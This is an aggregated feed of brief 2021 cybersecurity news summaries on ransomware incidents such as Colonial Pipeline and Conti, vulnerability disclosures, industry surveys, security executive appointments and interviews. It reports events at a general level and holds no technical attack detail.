ASIS releases updated Protection of Assets reference set

To keep pace with the ever-evolving security industry, ASIS International released an update to the Protection of Assets (POA) reference set. Refreshed to reflect our changing times and keep security professionals on the leading edge of best practices in the field, this collection is to assist security management directors and professionals responsible for corporate asset protection. 

from Cyber Security News https://ift.tt/3urGDSF

APT actors exploiting Fortinet vulnerabilities to gain access to local governments

A web server hosting the domain for a local government in the United States was recently breached by advanced hackers taking advantage of old vulnerabilities in firewalls sold by Fortinet, according to an FBI Flash Alert issued. After gaining access to the local government organization's server, the advanced persistent threat (APT) actors moved laterally through the network and created new domain controller, server, and workstation user accounts mimicking already existing ones.

from Cyber Security News https://ift.tt/3oZwBXU

DHS TSA announces Security Directive for pipeline sector

The Department of Homeland Security’s Transportation Security Administration (TSA) announced a Security Directive that will enable the Department to better identify, protect against, and respond to threats to critical companies in the pipeline sector.

from Cyber Security News https://ift.tt/3i0TNU0

5 minutes with Barak Tawily - Application security for enterprise security

Barak Tawily, Chief Technology Officer and Co-Founder of Enso Security, argues that most AppSec teams today spend most of their time creating relationships with developers and performing operational and product-related tasks — and not on application security. Here, we talk to Tawily about AppSec and why enterprise security should be concerned with AppSec.

from Cyber Security News https://ift.tt/3wEDIrd

Why SASE is the key to unlocking widespread Zero Trust adoption

Streaming - and really all content creators and consumers - would not have accelerated as it did without that much-needed bandwidth. In much the same way, we see the idea of Zero Trust Network Security, introduced more than a decade ago, needing its own boost for more widespread adoption. That help has arrived in the form of Secure Access Service Edge (SASE), the ideal framework for Zero Trust.

from Cyber Security News https://ift.tt/3fO8gQF

How DevOps has changed the way app security works (Part 2)

App security is too important to be an afterthought. With the threats facing modern web applications, organizations need to find a new way to ensure protection without impeding innovation. To move forward, security and DevOps will need to work together to solve the challenges they face—in terms of both security and organizational politics.

from Cyber Security News https://ift.tt/34rEhIR

67% of utility applications have serious vulnerabilities

With the Colonial Pipeline ransomware attacks that caused widespread East Coast fuel shortages still fresh in our minds, new WhiteHat Security research has found that application specific attacks are equally, if not more, likely than ransomware attacks.

from Cyber Security News https://ift.tt/3yKpSpl

Half of U.S. companies hit with privileged credential theft, insider threats in last year

ThycoticCentrify announced new research that reveals more than half of organizations have been grappling with the theft of legitimate, privileged credentials (53%) and insider threat attacks (52%) in the last 12 months. In 85% of the privileged credential theft instances, cybercriminals were able to access critical systems and/or data. In addition, two-thirds (66%) of insider threats led to abuse of administrative privileges to illegitimately access critical systems and/or data. 

from Cyber Security News https://ift.tt/2R2kvRm

Average cost of cloud account compromises reached $6.2 million over a 12-month period

Proofpoint, Inc. and Ponemon Institute released the results of a new study on “The Cost of Cloud Compromise and Shadow IT.” The average cost of cloud account compromises reached $6.2 million over a 12-month period, according to over 600 IT and IT security professionals in the U.S. In addition, 68% of these survey respondents believe cloud account takeovers present a significant security risk to their organizations, with more than half indicating the frequency and severity of cloud account compromises has increased over the last 12 months.

from Cyber Security News https://ift.tt/3fStyMO

5 minutes with Jason Passwaters - What cyberthreat intelligence can learn from the military

As a former Marine with expertise in counterintelligence, Human Intelligence (HUMINT) and Technical Surveillance Counter-Measures (TSCM), Jason Passwaters leveraged his international war fighting experience and built uniquely qualified teams at iSIGHT Partners, and then in co-founding Intel 471. His military service taught him to emphasize three areas that can make threat intelligence more targeted and actionable for organizations. 

from Cyber Security News https://ift.tt/3vr8Gmt

Bose victim of ransomware attack

In a breach notification letter filed with New Hampshire's Office of the Attorney General, Bose said that in early March 2021, the company "experienced a sophisticated cyber-incident that resulted in the deployment of malware/ransomware across" its "environment."

from Cyber Security News https://ift.tt/3bV8hBe

U.S. to issue first cybersecurity regulations after Colonial Pipeline ransomware attack

The Department of Homeland Security (DHS) will issue a directive later this week requiring all pipeline companies to report cybersecurity incidents to federal authorities. The directive comes two weeks after Colonial Pipeline, which operates the biggest gasoline conduit to the East Coast, was forced to shut down its 5,500-mile pipeline after a devastating ransomware attack.

from Cyber Security News https://ift.tt/3wztoRl

Mission-critical: Northern Virginia sets out to solve the cybersecurity workforce shortage

What the COVID-19 crisis is ultimately doing to the cybersecurity industry is shining a spotlight on it.bIn what is one of the only benefits of the critical issue, it has allowed many in Northern Virginia to elevate and extend a slew of innovative measures that companies and region are implementing to combat the problem. As they set out to solve the industry talent shortage, Northern Virginia found the following strategies to be impactful steps in tandem toward a solution.

 

from Cyber Security News https://ift.tt/3yGK4rR

5 minutes with Tehila Shneider - Authorization policy management in the enterprise

While authentication and authorization might sound similar, they are two distinct security processes in the identity and access management (IAM) space. Authentication is the security practice of confirming that someone is who they claim to be, while authorization is the process of establishing the rights and privileges of a user. Here, we talk to Tehila Shneider about authorization, authentication, and why authorizations remains a problem that is mostly unsolved. 

from Cyber Security News https://ift.tt/3bUGktg

Conti ransomware attacks impact healthcare and first responder networks

The FBI identified at least 16 Conti ransomware attacks targeting U.S. healthcare and first responder networks, including law enforcement agencies, emergency medical services, 9-1-1 dispatch centers, and municipalities within the last year. These healthcare and first responder networks are among the more than 400 organizations worldwide victimized by Conti, over 290 of which are located in the U.S.

from Cyber Security News https://ift.tt/3oMpkKS

GAO: Cyber premiums rise as insurers struggle to assess risk

The increase in cyber insurance adoption and premium prices coincides with a changing — and more challenging — threat landscape, this according to a new GAO report on cyber insurance. The report describes key trends in the current market for cyber insurance, and identified challenges faced by the cyber insurance market and options to address them. To conduct the study, GAO analyzed industry data on cyber insurance policies; reviewed reports on cyber risk and cyber insurance from researchers, think tanks, and the insurance industry; and interviewed Treasury officials.

from Cyber Security News https://ift.tt/3oMso9K

J.R. Cunningham named Chief Security Officer at Nuspire

Nuspire, managed security services provider (MSSP), announced the appointment of industry veteran, J.R. Cunningham, as Chief Security Officer. In this role, Cunningham will oversee Nuspire’s security strategy, oversight of policies and compliance, and the new Nuspire Security Program, which is a step-by-step program designed to help Nuspire’s customers build customizable security programs. Cunningham joins Nuspire with over 25 years of experience, building and maintaining security programs, security strategy consulting, cyber practitioner leadership and creating successful long-term client relationships through strategic consulting. I

from Cyber Security News https://ift.tt/34diAft

Palo Alto Cortex Xpanse Researchers identify missing metric for a modern SOC

Palo Alto Cortex Xpanse research team spent the first three months of 2021 monitoring the activities of attackers to better understand how much of an edge adversaries have in detecting systems that are vulnerable to attack. They followed a benchmark that they call “mean time to inventory” (MTTI), which is simply how long it takes somebody to start scanning for a vulnerability after it’s announced. Xpanse research found 79% of observed exposures occurred in the cloud.

from Cyber Security News https://ift.tt/3yzBQ4Z

Only 1 in 5 say critical infrastructure organizations should pay ransom if attacked

In the aftermath of the Colonial Pipeline attack, global IT association and learning community ISACA polled more than 1,200 members in the United States and found that 84% of respondents believe ransomware attacks will become more prevalent in the second half of 2021. The Colonial Pipeline attack caused massive disruptions to gasoline distribution in parts of the US this month, resurfacing preparedness for ransomware attacks as a front-burner topic for enterprises around the world. Colonial reportedly authorized a ransom payment of US $4.4 million. In the ISACA survey, four out of five survey respondents say they do not think their organization would pay the ransom if a ransomware attack hit their organization. Only 22% say a critical infrastructure organization should pay the ransom if attacked.

from Cyber Security News https://ift.tt/2Tfp2k7

Digital security infrastructure unlocks the door to a more secure return to the office

One thing is clear: the hybrid model will be permanent. In addition to managing the concerns about physical safety with staffers in the building, any outbreaks or high absenteeism negatively impact the bottom line and the company’s reputation. Occupier requirements are constantly evolving and they are driving new considerations for landlords and workspace providers. It takes best-of-breed technology to remove the complexity and make workspaces really work effectively while meeting the increased demands of today’s tenants. Let’s review the core considerations and components required to create a secure tech operating layer that reassures the integrity of the workspace, operation and infrastructure while delivering a great occupier experience. 

from Cyber Security News https://ift.tt/3fJjq94

5 minutes with Roy Horev - The evolution of DDoS attacks

Distributed denial of service (DDOS) attacks - when an attacker attempts to make it impossible for a service to be deliverable - are increasing in size, frequency and duration. Kaspersky Lab reported a doubling of DDoS attacks in the first quarter of 2020 compared with the fourth quarter of 2019, plus an 80% jump compared with the same quarter last year. To learn more about how these attacks have evolved over the years, we talk to Roy Horev, Co-Founder and CTO at Vulcan Cyber, a vulnerability remediation orchestration provider.

from Cyber Security News https://ift.tt/3bL2Kgf

Data of more than 100 million Android users exposed by mobile app developers

Researchers at Check Point Research analyzing Android apps have discovered serious cloud misconfigurations leading to the potential exposure of data belonging to more than 100 million users. In a report published recently, the firm discusses how the misuse of real-time database, notification managers, and storage exposed over 100 million users’ personal data (email, passwords, names, etc.) and left corporate resources vulnerable to malicious actors.

from Cyber Security News https://ift.tt/2SikF76

5 steps to integrating security into the app development process (without disrupting CI/CD workflows)

The traditional approach to securing cloud access goes against everything that DevOps is about. Regardless of what providers of legacy IAM, PAM, and other security solutions claim about their ability to scale with cloud application dev cycles, they’re concealing the extensive time, effort, and resources required to manage their solutions – three things that are in short supply in DevOps teams.  So, the challenge becomes: how can enterprises integrate world class technologies for securing identities and access to cloud environments without bringing DevOps to a grinding halt?

from Cyber Security News https://ift.tt/2RyjiRO

New survey finds that password hygiene amongst cybersecurity leaders is lacking

Constella Intelligence (“Constella”), Digital Risk Protection leader, released the results of “Cyber Risk in Today’s Hyperconnected World,” a survey that unlocks the behaviors and tendencies that characterize how vigilant organizations’ leaders are when it comes to reducing cyber vulnerability, allowing the industry to better understand how social media is leveraged as an attack vector and how leaders are responding to this challenge.

from Cyber Security News https://ift.tt/2SWPoaf

5 minutes with Todd Waskelis - Cybersecurity consulting during the pandemic

COVID-19 brought with it a massive influx of data, most of it moving from a centralized location to the cloud (and other environments). Now, these businesses are trying to understand how to re-engineer their environment for the next 10+ years, in the advent of Zero Trust, SASE and more. How has COVID-19 impacted the need for cybersecurity consulting, specifically new trends, and Zero Trust? Here, we speak with Todd Waskelis, AVP of AT&T Cybersecurity, who leads AT&T’s cybersecurity consulting services. 

from Cyber Security News https://ift.tt/341XP6r

Can you hack the municipality of The Hague (Nl)?

The municipality of The Hague in The Netherlands allows itself to be hacked every year during Hâck The Hague. A hacking competition organized by the municipality, together with cybersecurity company Cybersprint. On Monday, September 27, 2021, 200 ethical hackers from the Netherlands and abroad will once again try to detect vulnerabilities in the digital infrastructure of the municipality and its suppliers. With this competition, The Hague wants to increase its resilience and stimulate its suppliers to continuously be in top digital condition, so that peace and security can be guaranteed.  

from Cyber Security News https://ift.tt/2S68iLw

The pandemonium of the pandemic: How working from home has changed the cybersecurity formula

Now, let’s consider how the pandemic has impacted the world of cybercrime. In the beginning, the move to work from home was swift, with organizations being closed and the workforce being sent home to work with little or no warning. People began stockpiling items and even staples such as toilet paper became a scarce commodity. As schools closed, the students were forced to start doing classes online, something a lot of families were not prepared for. Many found themselves in financial difficulties. For those still working, with daycares closing, childcare became an issue, and many people did not have laptops or computers set up at home to support these changes. Even webcams became nearly impossible to get unless you were willing to pay the scalpers’ prices.

from Cyber Security News https://ift.tt/3v3hsaf

ARP funding to boost school safety, technology upgrades across the U.S.

Congress sent some rather clear messages with passage of the American Rescue Plan (ARP), and the importance of education is undoubtedly top of mind. Based on the sheer volume of school safety allocations, protecting our nation’s students is a high priority with the Biden administration and a majority in Congress.

from Cyber Security News https://ift.tt/33XJzLU

New research shows how security teams can avoid cyberattacks by utilizing the right data and artificial intelligence

Vectra AI, provider of threat detection and response,  released its 2021 Q2 Spotlight Report, Vision and Visibility: Top 10 Threat Detections for Microsoft Azure AD and Office 365. This new research details the top 10 threat detections that customers receive by relative frequency when Vectra detects abnormal behavior in a customer environment, which are then used by customers to help ratify attacks in cloud environments.

from Cyber Security News https://ift.tt/3u1olYj

FBI sees record complaints for online scams and investment fraud

The FBI says that complaints concerning online scams and investment fraud have now reached a record-breaking level. The Internet Crime Complaint Center (IC3) received its six millionth complaint on May 15. It took nearly seven years for the FBI’s Internet Crime Complaint Center (IC3) to log its first million complaints. It took only 14 months to add the most recent million. 

from Cyber Security News https://ift.tt/3yq66Pu

5 minutes with Ben Johnson - SaaS apps security issues

​​​​​​Ben Johnson, former NSA and Chief Technology Officer (CTO) of SaaS application security firm, Obsidian, has found that businesses around the world are adopting Software as a service (SaaS) apps in droves for collaboration, ease of access to data and business continuity. With this increased adoption, comes the inevitable trend of state-sponsored actors merely logging in to steal data rather than having to break in. Here, Johnson talks to Security magazine about security issues associated with SaaS applications. 

from Cyber Security News https://ift.tt/33Xg79a

Moving to measure a cyber-aware culture

We have all been served by a surly retailer whose made us feel that their job and life would be easier, if it weren’t for the customers. Alas, sometimes it feels the same applies in cybersecurity. Life would be so much better, if not for those pesky employees.

from Cyber Security News https://ift.tt/3our0Zo

Colonial Pipeline ransomware attack proves yet again that cybesecurity is paramount: Why companies don’t take cybersecurity seriously

The recent ransomware attack of the Colonial Pipeline has reinvigorated calls from legislators to strengthen the defenses of U.S. pipelines and the electric power grid. Over the last several years, a repeatable pattern is becoming apparent with each major cyber-attack. A critical cyberattack occurs that is followed by outrage that result in statements from government leaders with calls for action - all followed by proposed ideas on how to better mitigate the risk of cyberattacks in the future. Yet, it seems that time goes by and with the next major attack the cycle starts all over again. This time, government is taking a more rigorous approach to proposing solutions to end the vicious cycle.

from Cyber Security News https://ift.tt/2SXdEZT

Conti ransomware gang to blame for Irish public health system cyberattack

Conti ransomware gang appears to be behind Ireland's Health Service Executive (HSE) ransomware attack, according to reports. HSE, a $25 billion public health system, shut down its IT systems to protect the service from further damage, switching to a paper-based system. Though life-saving equipment and COVID-19 vaccine programs were still operating, several healthcare practices across Ireland were forced to cancel low priority appointments.

from Cyber Security News https://ift.tt/3wbyQtB

PHDays and The Standoff taking place May 18-21

The Standoff 2021 is taking place this week May 18-21, in conjunction with PHDays (Positive Hack Days) – one of the top cybersecurity conferences in Europe that features the world's cutting edge in digital security every year. The Standoff is an online offensive/defensive competition in which defenders (blue teams) compete against attackers (red teams) to control the infrastructure of a simulated digital city.

from Cyber Security News https://ift.tt/3v0CB4N

Rapid7 victim of a software supply chain breach

Rapid7's disclosed that the attackers behind the Codecov breach had accessed some of the company's source code using a previously compromised Bash Uploader script from Codecov.

from Cyber Security News https://ift.tt/3yk8Q0O

Welcome to the new world of triple extortion ransomware

Ransomware is nothing new. But the tactics, techniques and procedures (TTPs) leveraged by threat actors have reached new levels of sophistication over the last few years. And with that growth has come an increased difficulty in protecting networks against costly attacks such as the recent DarkSide one on the Colonial Pipeline.

from Cyber Security News https://ift.tt/2ST5l17

Healthcare’s next emergency: Ransomware follows in the footsteps of the pandemic

Healthcare businesses are already reeling from massive losses during the pandemic, and cyberattacks could cause further long-term damage beyond the initial attack. Research at Morphisec indicates that almost 3-in-10 consumers say they would consider switching providers if their records were breached in a cyberattack. Considering that same report found that 1-in-5 Americans say a cyberattack has impacted their healthcare provider in the past year, it’s undoubtedly worrying news for the entire industry. With this in mind, here are three avenues hackers are likely to exploit as healthcare becomes a more attractive target and what providers’ need to do to protect their sensitive data and safeguard the lives of their patients.

from Cyber Security News https://ift.tt/3or60Tt

FIRST 33rd Annual Conference to be streamed live June 7-9, 2021

The Forum of Incident Response and Security Teams (FIRST) will hold its 33rd annual conference next month, June 7-9, 2021. Held online, the 33rd FIRST Conference: ‘Crossing Uncertain Times,’ is set to stream live from June 7, UTC at 1200hrs. The three-day event will feature keynote presentations highlighting recent global security incidents, pertinent industry panel discussions, and a range of presentations by global experts from across the incident response and security industry.

from Cyber Security News https://ift.tt/3uTsoXV

Who owns AD security in your organization?

Establishing operational resilience in the face of cyberattacks has become a top priority for organizations. As a core component of the IT infrastructure, Active Directory (AD) must be at the center of that process. But who is responsible for ensuring Active Directory is both protected and can be recovered quickly when a cyberattack occurs? In many organizations the answer is not clear, which can lead to missteps in detecting, defending against, and responding to cyberattacks.

from Cyber Security News https://ift.tt/3omZay4

How to select a cybersecurity framework to protect your greatest assets: People, property and data

Even if you are not mandated to adhere to any particular regulations, it still makes sense for your business to be proactive in managing risk. All frameworks include guidance for good cybersecurity hygiene, such as effective inventory and asset management, contingency planning, personnel security, system access control, and staff awareness and training, to list a few. To prepare for the aftermath of a cyber incident, frameworks provide incident response guidelines you can follow to recover and try to limit the damage. Establishing a framework can not only help your organization follow best practices but also bring rigorous cyber discipline to your organization.

from Cyber Security News https://ift.tt/2RgYOwU

President Biden signs executive order to strengthen U.S. cybersecurity defenses

U.S. President Joe Biden has signed an executive order (EO) to improve the cybersecurity of the U.S.  As the U.S. faces persistent and increasingly sophisticated malicious cyber campaigns that threaten the public sector, the private sector, and ultimately people’s security and privacy, the EO seeks to improve efforts to identify, deter, protect against, detect, and respond to these actions and actors. Specifically, the EO will: 

from Cyber Security News https://ift.tt/2RUvnko

Wi-Fi vulnerability may put millions of devices at risk

Noted security expert Mathy Vanhoef recently discovered a Wi-Fi security vulnerability, that if exploited, it would allow an attacker within radio range to steal user information or attack devices. The security vulnerability, known as FragAttacks - fragmentation and aggregation attacks - are design flaws in the Wi-Fi standard and therefore affects most devices. In addition, Vanhoef discovered several other vulnerabilities that are caused by widespread programming mistakes in Wi-Fi products. 

from Cyber Security News https://ift.tt/3yc1oVM

Learnings from the Colonial Pipeline cyberattack: focus on the 98% of attacks, not the 2%!

For many years, the focus on securing OT environments has been on the imminent danger of a cyberattack upon critical infrastructure, in other words, SCADA/ICS attacks. Most of the concern has been on nation state actors like China, North Korean, Iran and Russia directly attacking and destroying our infrastructure. 

from Cyber Security News https://ift.tt/3fdc3qu

Cybersecurity tips for your remote workforce

As a significant number of employees are now working remotely, cyber criminals are hard at work devising new ways to infiltrate your networks and take advantage of unsuspecting targets. Listed below are a few of the more prevalent attempts being used to gain access and potentially disrupt your business and steps you can take to help stop them.

from Cyber Security News https://ift.tt/2RdR6Uf

Apple failed to disclose security incident affecting 128 million users in 2015

An email entered into court this week in Epic Games' lawsuit against Apple shows that Apple managers uncovered 2,500 malicious apps had been downloaded a total of 203 million times by 128 million users in 2015. Evidence shows Apple managers chose to not disclose this security incident. 

from Cyber Security News https://ift.tt/33E2DPs

Most enterprise cybersecurity teams lack the ability to remediate risk

Vulcan Cyber released the results of its latest vulnerability remediation maturity research project. A survey of more than 100 enterprise security executives across North America and EMEA found that most enterprise cybersecurity and vulnerability management organizations lack the ability to drive remediation initiatives, to reduce risk and achieve acceptable levels of cyber hygiene.

from Cyber Security News https://ift.tt/33zTven

Study reveals growing cybersecurity risks driven by remote work

HP Inc. released its HP Wolf Security Blurred Lines & Blindspots Report, a comprehensive global study assessing organizational cyber risk in an era of remote work. The report shows that changing work styles and behaviors are creating new vulnerabilities for companies, individuals, and their data. According to the findings, 70% of office workers surveyed admit to using their work devices for personal tasks, while 69% are using personal laptops or printers for work activities. Almost one-third (30%) of remote workers surveyed have let someone else use their work device.

from Cyber Security News https://ift.tt/3uKVb0S

The perils of lax security hygiene and what organizations can do about it

While cybersecurity attack methods are rapidly evolving, it's more often than not a misuse of administrative privileges and weak or stolen credentials that are enough to breach any critical infrastructure. Let's take the attack on the water treatment plant for example—all it took for the unidentified perpetrator was one unprotected password to access and handle the control systems remotely. Time and again, incidents like this prove that when passwords are stored in secure vaults and are subject to standard security practices, the chances of getting hacked are far lower.

from Cyber Security News https://ift.tt/3bkWo7g

How to prioritize patching in the exploit storm

COVID made “flatten the curve” a household phrase in 2020, but did you know the concept also applies to vulnerability exploits? It turns out that what’s past is prologue in exploit trends. By tracking which attacks are being exploited the most, organizations discover important information to help proactively determine their vulnerability and risk. But it is also important to track attacks where activity has increased the most within a specified timeframe. It only takes one critical exploit to cause significant damage and, once inside the network, the attacker will need to move laterally and probably deploy additional exploits. That’s why understanding which exploits have the greatest likelihood of arriving on the network’s doorstep helps organizations prioritize patch management and risk assessment. This remains top of mind as cyber adversaries continue to maximize vulnerabilities, as we have recently seen with DearCry ransomware, for example.

from Cyber Security News https://ift.tt/2RamJxS

The value of better data in third-party risk assessments

RiskRecon, a Mastercard Company, and the Cyentia Institute published “From Uncertainty to Understanding: The Value of Better Data in Third-Party Risk Assessments.” To help organizations choose the best data to power their third-party risk models, RiskRecon partnered with Cyentia Institute to conduct the research study that quantifies how high-fidelity data turns risk assessments from an exercise of uncertainty to one of understanding.

from Cyber Security News https://ift.tt/3uCCcFG

Jim Doggett named CISO at Semperis

Semperis announced the appointment of James (Jim) W. Doggett Jr. as chief information security officer (CISO). A longtime partner at Ernst & Young (EY) LLP and a veteran security and risk executive, Doggett will be responsible for managing Semperis’ cybersecurity posture and information and risk management program, along with helping customers improve the resiliency of their foundational identity systems.

from Cyber Security News https://ift.tt/3f7CrlA

Now ransomware is inundating public school systems

Almost every American adult knows that cyberattacks and breaches are ubiquitous and have primarily targeted companies and government entities. They might even know that the single most common breach these days is ransomware, a malicious process by which hackers dismantle computer systems and don’t fix them until a ransom is paid. Few, however, are aware that ransomware is targeting a new set of highly vulnerable victims en masse. In recent months, the majority of successful ransomware attacks have struck K-12 schools nationwide, casting a whole new light on the number of Americans highly susceptible to a cyberattack.

from Cyber Security News https://ift.tt/3bgvvBx

How to defend your network systems from cyberattack

Let’s face it. Cybercriminals are smart. They’re aggressive, persistent, and opportunistic. They can sniff out an open port—a device running outdated software—and use it to invade the network. With cyberattacks on the rise, companies need to continually assess threats and adjust their cybersecurity posture accordingly.

from Cyber Security News https://ift.tt/33vXSar

Colonial Pipeline remains offline after ransomware attack

Colonial Pipeline, which operates the biggest gasoline conduit to the East Coast, said it has no estimate on when it could restart the 5,500-mile pipeline that it shut Friday after a cyberattack. The company took systems offline to contain the threat, temporarily halting all pipeline operations and affecting some IT system. In a statement, the company said the Colonial Pipeline operations team is developing a system restart plan, and while their mainlines remain offline, some smaller  lateral lines between terminals and delivery points are now operational. 

from Cyber Security News https://ift.tt/3o230wx

Google wants to enable MFA by default

In a blog post commemorating World Password Day, Google announced the move to make users sign in via a second step after entering a password, such as a mobile app.

from Cyber Security News https://ift.tt/3bcYCp2

AXA halts ransomware crime reimbursement in France

Global insurance company AXA said Thursday it will stop writing cyber-insurance policies in France that reimburse customers for extortion payments made to ransomware criminals.

from Cyber Security News https://ift.tt/3nZVwtY

Lessons learned from the iPhone call recording app vulnerability

News quickly spread about a vulnerable call recording app for iPhone named “Call Recorder,” or “Acr call recorder,” as its listing in the Apple App Store states. TechCrunch was the first outlet to flag a design flaw with the mobile application’s API when it obtained call recordings from AWS S3 cloud storage to prove it was insecure and therefore open to API-based attacks. The weaknesses exhibited by the mobile app represent a vital shift occurring in cybersecurity towards the importance of the protection and hardening of APIs. From this instance alone, we can learn a number of valuable lessons as API attacks are set to rise drastically this year. Most of the issues in the Call Recorder vulnerability map directly to the OWASP API Security Top 10, a list that captures the most common API mistakes. This document is a great reference for DevOps and security teams that are looking to implement strong API security that can be applied to both web and mobile application systems, including those in the cloud.

from Cyber Security News https://ift.tt/3vUHFrq

David Ting named CISO at Nylas

David Ting assumes the role of Chief Information Security Officer (CISO) at productivity infrastructure solutions provider Nylas.

from Cyber Security News https://ift.tt/2Rzo698

Peloton's API exposes riders' private data

Peloton’s leaky API has allowed any hacker to obtain any user’s account data — even if that user had set their profile to private. The vulnerability, which was discovered by security research firm Pen Test Partners, allowed requests to go through for Peloton user account data without checking to make sure the request was authenticated. As a result, the exposed API could let anyone access any Peloton user’s age, gender, city, weight, workout stats, and birthday.

from Cyber Security News https://ift.tt/2SunjqB

51% of organizations have experienced a data breach caused by a third-party

SecureLink and Ponemon Institute today released a new report titled “A Crisis in Third-party Remote Access Security”, revealing the alarming disconnect between an organization’s perceived third-party access threat and the security measures it employees. Findings revealed that organizations are not taking the necessary steps to reduce third-party remote access risk, and are exposing their networks to security and non-compliance risks. As a result, 44% of organizations have experienced a breach within the last 12 months, with 74% saying it was the result of giving too much privileged access to third-parties.

from Cyber Security News https://ift.tt/3h4ykt7

Best practices during World Password Day

Thursday, April 6 is World Password Day, a day dedicated to promoting safer password practices. Strong password management has been especially important as cyberattacks have skyrocketed since the onset of the pandemic and the switch to remote work. As many employees continue to work from home, security is more important than ever and passwords can be the first line of defense against computers, networks, and to sensitive and vulnerable enterprise and personal information. Here, security executives share their insight and tips on how to create and promote safer password practices in the enterprise and among employees.

from Cyber Security News https://ift.tt/3h5z3tX

Financial services experienced 125% surge in exposure to mobile phishing attacks in 2020

Lookout, Inc. released a report showing that mobile phishing exposure doubled among financial services and insurance organizations between 2019 and 2020. The Lookout Financial Services Threat Report illustrates that these organizations were not immune to mobile phishing despite an increased adoption of mobile device management (MDM).

from Cyber Security News https://ift.tt/2QOXHV7

Inside look at the Genesis Market, a cybercriminal market

Digital Shadows released new research into the movement of cybercriminal marketplaces with a feature on Genesis market. According to the Digital Shadows Photon Research Team, Genesis is a high-profile and trusted repository of digital fingerprints that has grown in popularity since it was launched in beta in 2017. In 2020, Genesis commanded 65% of mentions across criminal forums for fingerprinting services. While other markets have come and gone, Genesis continues to endure and has grown year-on-year. In the last two months alone, more than 5,000 new listings have been added to Genesis, bringing the total number of listings to more than 350,000.

from Cyber Security News https://ift.tt/3uod9Wt

The top three collaboration security misses by CISOs

As we continue to embrace hybrid work, chief information security officers (CISOs) and compliance teams are wading through and in some cases even overlooking many different areas related to collaboration security. We’ve highlighted the top three areas of risk in this post which should keep CISOs awake at night. The remote workplace continues to evolve at lightning speed, and so too should CISOs – or risk sensitive materials ending up in the wrong hands.

from Cyber Security News https://ift.tt/3utthpS

Corporate boards are better at cybersecurity but still need improvement

While a number of useful countermeasures are being taken across corporate boards, progress remains relatively slow in the face of borderline existential threats. Not so long ago, companies thought of cybersecurity as a technology problem to be overseen by the chief security officer or the chief information officer, or as a compliance issue to be managed with audit functions. Today, thankfully, a more holistic, proactive and analytical approach is generally taken. There is more security training and better hygiene and most boards now count a seasoned CISO as one of their directors.

from Cyber Security News https://ift.tt/3xJ4joq

7 things every CISO must know about ransomware

Ransomware is one of the most prominent cybersecurity threats organizations face today. Any institution or company (small or large) can fall victim to ransomware – including schools, healthcare providers, educational facilities, non-profit entities, and government agencies. Cybercriminals that deploy ransomware attacks do not discriminate. Thankfully, there are ways to protect your organization from ransomware attacks. In this article, you’ll discover everything you need to know about ransomware as a chief information security officer (CISO), from its evolution to preventative methods to prevention.

from Cyber Security News https://ift.tt/3eXDqVh

Exploitation in the time of COVID

BlackBerry Limited released its 2021 BlackBerry Threat Report, detailing a sharp rise in cyberthreats facing organizations since the onset of COVID-19. The research shows a cybercrime industry which has not only adapted to new digital habits, but also become increasingly successful in finding and targeting vulnerable organizations.

from Cyber Security News https://ift.tt/33hYeBi

Why security has broken down—and what it means now

Life used to be simpler for security teams. In the legacy world, they had a clear understanding of the environment they needed to protect—typically the standard LAMP stack (Linux, Apache, MySQL, PhP). Within this straightforward, relatively static infrastructure, they could carve out a network layer all for themselves to implement the security technologies of their choice. They also had a direct line to vendors to discuss the security controls that needed to be implemented. But in the age of DevOps and cloud, things just don’t work this way anymore. Four key changes have left security teams struggling to protect applications and organizations.

from Cyber Security News https://ift.tt/3gYuh1r

Cybersecurity workforce minimally impacted by pandemic, but still grappling with persistent hiring challenges

The pandemic’s disruption has rippled across the globe, impacting workforces in nearly every sector. However, according to the findings from the State of Cybersecurity 2021 Part 1 survey report from ISACA in partnership with HCL Technologies, the cybersecurity workforce has largely been unscathed, though all-too familiar challenges in hiring and retention continue at levels similar to years past.    

from Cyber Security News https://ift.tt/3vAqQlm

Post-pandemic organizational resilience lies within supply chain, information security

In order to remain resilient and meet the emerging priorities around effective supplier management, improved business continuity planning, and increased community engagement, business leaders need to assess and benchmark their performance around three core areas of organizational resilience: operational resilience, supply chain resilience, and information resilience.

from Cyber Security News https://ift.tt/3vDsC5p

NSA releases cybersecurity advisory on ensuring security of operational technology

The National Security Agency (NSA) released the Cybersecurity Advisory, “Stop Malicious Cyber Activity Against Connected Operational Technology” , for National Security System (NSS), Department of Defense (DoD), and Defense Industrial Base (DIB) operational technology (OT) owners and operators. The CSA details how to evaluate risks to systems and improve the security of connections between OT and enterprise networks. Information technology (IT) exploitation can serve as a pivot point for OT exploitation, so carefully evaluating the risk of connectivity between IT and OT systems is necessary to ensure unique cybersecurity requirements are met.

from Cyber Security News https://ift.tt/2QK8lwo

Paul Suarez joins Casey's General Stores as CISO

Paul Suarez joins Casey's General Stores in the newly created Chief Information Security Officer position at the company, which operates 2,200 convenience stores across 16 states.

from Cyber Security News https://ift.tt/3nKhil2

Zoom joins CVE program as a CVE Numbering Authority (CNA)

Zoom has joined the CVE Program as a CVE Numbering Authority (CNA). The CVE Program’s overall mission is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities that require third-party notification or coordination to fully remediate. Cybersecurity and IT professionals use CVE records to ensure they are discussing the same security issue, coordinate their efforts, and prioritize and address vulnerabilities. The program is an international, community-based effort and relies on the industry norms of the responsible and coordinated security community to discover vulnerabilities.  

from Cyber Security News https://ift.tt/3aWZWMU

3 steps to promote a human-centric security awareness culture

Human error contributes to almost 95% of security breaches. Most security approaches still fail at making a desired impact. Let’s analyze the two main reasons why businesses fail to develop a robust, human-centric security approach.

from Cyber Security News https://ift.tt/3eb3KvL

Security Executive Council welcomes five new security experts

The Security Executive Council (SEC) has welcomed Tom Bello, Coral Gehring, Matthew Giese, Bill King, and Tom Mahlik to its faculty of esteemed security experts. SEC subject matter experts and emeritus faculty (former CSOs and CISOs) have excelled in their careers and are eager to transfer their knowledge and competencies to other security leaders.

from Cyber Security News https://ift.tt/2QO1CRW